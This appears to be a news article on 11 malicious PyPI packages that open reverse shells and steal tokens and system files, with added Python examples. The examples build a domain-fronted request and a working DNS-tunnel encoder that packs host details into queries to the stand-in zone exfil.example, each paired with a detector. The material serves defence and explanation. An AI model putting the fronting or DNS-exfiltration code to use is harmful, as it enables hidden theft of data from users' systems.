11 malicious packages found in PyPI

A few days ago it was announced that 11 packages containing malicious code had been found in the PyPI (Python Package Index) repository.

Before the problem was spotted, the packages had been downloaded about 38 thousand times in total. It should be noted that the malicious packages found stand out for using sophisticated methods to hide their communication channels with the attackers' servers.

The packages found are as follows:

  • importantpackage (6305 downloads) and important-package (12897): these packages open a connection to an external server disguised as a connection to pypi.python.org in order to give the attacker shell access to the system (reverse shell), and use the trevorc2 tool to hide the communication channel.
  • pptest (10001) and ipboards (946): use DNS as the communication channel to transfer information about the system (in the first package the hostname, working directory and internal and external IP; in the second, the username and hostname).
  • owlmoon (3285), DiscordSafety (557) and yiffparty (1859): look for a Discord service token on the system and send it to an external host.
  • trrfab (287): sends an identifier, the hostname and the contents of /etc/passwd, /etc/hosts and /home to an external host.
  • 10Cent10 (490): opens a reverse shell connection to an external host.
  • yandex-yt (4183): displays a message saying the system has been compromised and redirects to a page with further information about the next steps, served through nda.ya.ru (api.ya.cc).

Given this, special attention is drawn to the way the importantpackage and important-package packages reach their external hosts: they abuse the Fastly content delivery network that fronts the PyPI catalog in order to hide their activity.

The requests were in fact sent to the pypi.python.org server (with python.org given as the server name in the SNI of the HTTPS handshake), but the HTTP "Host" header was set to the name of a server controlled by the attacker. The CDN forwarded such requests to the attacker's server, while on the wire the traffic was carried inside a TLS session established to pypi.python.org.

PyPI's infrastructure runs behind the Fastly content delivery network, which uses the Varnish transparent proxy to cache common requests and terminates TLS with CDN-level certificates rather than on the origin servers. Whatever the intended destination, requests arrive at the proxy, which works out the intended host from the HTTP "Host" header; hostnames resolve to the CDN's load-balancing IP addresses, which are shared by all Fastly customers.

The attacker's server was also registered with the Fastly CDN, which offers free-tier plans to everyone and even allows anonymous registration. Notably, the same scheme was also used to deliver requests to the victim when setting up the "reverse shell", but initiated from the attacker's side. From the outside, the interaction with the attacker's server looks like a legitimate session with the PyPI catalog, encrypted with PyPI's TLS certificate. This technique, known as "domain fronting", has long been used to hide the real hostname when bypassing blocking: it relies on an HTTPS option some CDNs offer, where a decoy host is named in the SNI and the host actually requested is passed in the HTTP Host header inside the TLS session.
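The following is an added example, not code from the article, from the researchers or from the malicious packages. It shows both sides of the fronting described above: `fronted_request` builds the HTTP request the malware would send inside a TLS session whose SNI names pypi.python.org (the SNI is what `ssl.SSLContext.wrap_socket(..., server_hostname=...)` would send; no connection is opened), and `find_fronting` is the egress check a defender can run if their TLS-inspecting proxy logs both the ClientHello SNI and the decrypted Host header. The log line format, the host `c2-front.example` and the sample records are constructed for this example.

```python
"""Spotting domain fronting at the egress: TLS SNI vs HTTP Host.

Added example, not code from the article, from JFrog or from the packages.
It assumes an egress proxy / TLS-inspection gateway that records, per request,
the SNI from the ClientHello and the Host header seen after decryption, in the
hypothetical line format used in SAMPLE_LOG below (constructed data).
"""
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Constructed sample egress log: one request per line, key=value fields.
SAMPLE_LOG = """\
2021-11-18T10:01:02Z 10.0.0.5 sni=pypi.python.org host=pypi.python.org path=/simple/requests/
2021-11-18T10:01:05Z 10.0.0.5 sni=files.pythonhosted.org host=files.pythonhosted.org path=/packages/a1/requests.whl
2021-11-18T10:02:17Z 10.0.0.7 sni=pypi.python.org host=c2-front.example path=/
2021-11-18T10:02:20Z 10.0.0.7 sni=www.python.org host=python.org path=/
"""


@dataclass(frozen=True)
class Request:
    ts: str
    client: str
    sni: str
    host: str
    path: str


def parse_line(line: str) -> Request:
    """Parse one constructed log line into a Request."""
    ts, client, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return Request(ts, client, kv["sni"], kv["host"], kv["path"])


def registrable(name: str) -> str:
    """Crude registrable domain: the last two labels. Enough for this example;
    a production detector should consult the Public Suffix List."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_fronted(req: Request) -> bool:
    """A fronted request names one site in SNI and another in Host.
    Differences inside one registrable domain (www.python.org vs python.org)
    are tolerated; a cross-domain mismatch is the fronting signature."""
    return registrable(req.sni) != registrable(req.host)


def find_fronting(lines: Iterable[str]) -> List[Request]:
    """Return every request whose SNI and Host disagree across domains."""
    return [r for r in (parse_line(l) for l in lines if l.strip()) if is_fronted(r)]


def fronted_request(front_sni: str, real_host: str, path: str = "/") -> Tuple[str, bytes]:
    """What the malware's request looks like on the wire: the TLS layer gets
    `front_sni` (the value passed as server_hostname to wrap_socket), while the
    HTTP request inside the tunnel names the real backend. Returns the pair
    without opening any connection."""
    req = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {real_host}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Connection: close\r\n\r\n"
    ).encode()
    return front_sni, req


if __name__ == "__main__":
    for r in find_fronting(SAMPLE_LOG.splitlines()):
        print(f"{r.ts} {r.client} fronted: sni={r.sni} host={r.host}")
```

The check only works where the proxy actually terminates TLS; a gateway that sees only the ClientHello will see nothing but a normal-looking session to pypi.python.org, which is exactly why the technique works.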

To further hide the malicious activity, the TrevorC2 package was used, which makes the interaction with the server look like ordinary web browsing.

The pptest and ipboards packages used a different approach to hide their network activity, based on hiding the useful data in requests to a DNS server. The malware transmits information by issuing DNS queries in which the data destined for the command-and-control server is base64-encoded into the queried domain name. The attacker receives these messages by controlling the DNS server for the zone.
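As an added example (not code from the article or from pptest/ipboards), the block below implements the channel just described end to end: the client side base64-encodes a system-information payload and splits it into query names under a zone the attacker controls, the server side reassembles and decodes whatever its authoritative resolver logged, and `looks_like_tunnel` is the simple length-plus-entropy heuristic a defender can run over DNS query logs. The zone `exfil.example`, the payload and the legitimate sample names are constructed for this example.

```python
"""DNS tunnel of the kind attributed to pptest/ipboards: data base64-encoded
into query names, read back by whoever runs the zone's authoritative server.

Added example, not code from the article or from the packages. The zone
exfil.example, PAYLOAD and LEGIT_QUERIES are constructed sample data.
"""
import base64
import math
from collections import Counter
from typing import Dict, List

LABEL_MAX = 63   # RFC 1035: a single label is at most 63 octets
CHUNK = 48       # data characters per label, leaving room for the sequence label


def b64url(data: bytes) -> str:
    """base64url without padding: only [A-Za-z0-9-_], all legal in a label."""
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def encode_queries(payload: bytes, zone: str) -> List[str]:
    """Client side: one query "<seq>.<chunk>.<zone>" per chunk of base64 text.
    Caveat: DNS names are case-insensitive, so a resolver that folds case
    corrupts base64; tunnelling tools often use base32 for that reason."""
    text = b64url(payload)
    chunks = [text[i:i + CHUNK] for i in range(0, len(text), CHUNK)]
    return [f"{seq}.{chunk}.{zone}" for seq, chunk in enumerate(chunks)]


def decode_queries(names: List[str], zone: str) -> bytes:
    """Server side: keep queries for our zone, reorder by sequence label,
    join, re-pad and decode. Tolerates queries arriving out of order."""
    parts: Dict[int, str] = {}
    for name in names:
        if not name.endswith("." + zone):
            continue
        seq, chunk = name[: -len(zone) - 1].split(".", 1)
        parts[int(seq)] = chunk
    text = "".join(parts[i] for i in sorted(parts))
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def entropy(s: str) -> float:
    """Shannon entropy of a string in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def looks_like_tunnel(name: str, min_len: int = 24, min_entropy: float = 3.5) -> bool:
    """Detection heuristic for one query name: a long, high-entropy label is
    the signature of encoded data. Short labels (sequence numbers, the zone
    itself, ordinary hostnames) never trip it."""
    labels = name.rstrip(".").split(".")
    return any(len(l) >= min_len and entropy(l) >= min_entropy for l in labels)


def flag_queries(names: List[str]) -> List[str]:
    """Return the query names that look like tunnel traffic."""
    return [n for n in names if looks_like_tunnel(n)]


# Constructed sample data: what pptest is described as collecting, plus a few
# ordinary names a host would resolve anyway.
PAYLOAD = b"hostname=dev-box;cwd=/home/alice;int=10.0.0.5;ext=203.0.113.9"
ZONE = "exfil.example"
TUNNEL_QUERIES = encode_queries(PAYLOAD, ZONE)
LEGIT_QUERIES = ["pypi.org", "files.pythonhosted.org", "www.google.com"]

if __name__ == "__main__":
    for q in TUNNEL_QUERIES:
        print("query:", q)
    print("recovered:", decode_queries(TUNNEL_QUERIES, ZONE))
    print("flagged:", flag_queries(LEGIT_QUERIES + TUNNEL_QUERIES))
```

A single high-entropy label is a weak signal on its own (CDN and anti-virus vendors legitimately use long encoded labels); in practice it is combined with the volume of unique subdomains per zone and the age of the zone, but the per-name check is the building block.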

Finally, if you are interested in learning more about it, you can consult the details at the following link.

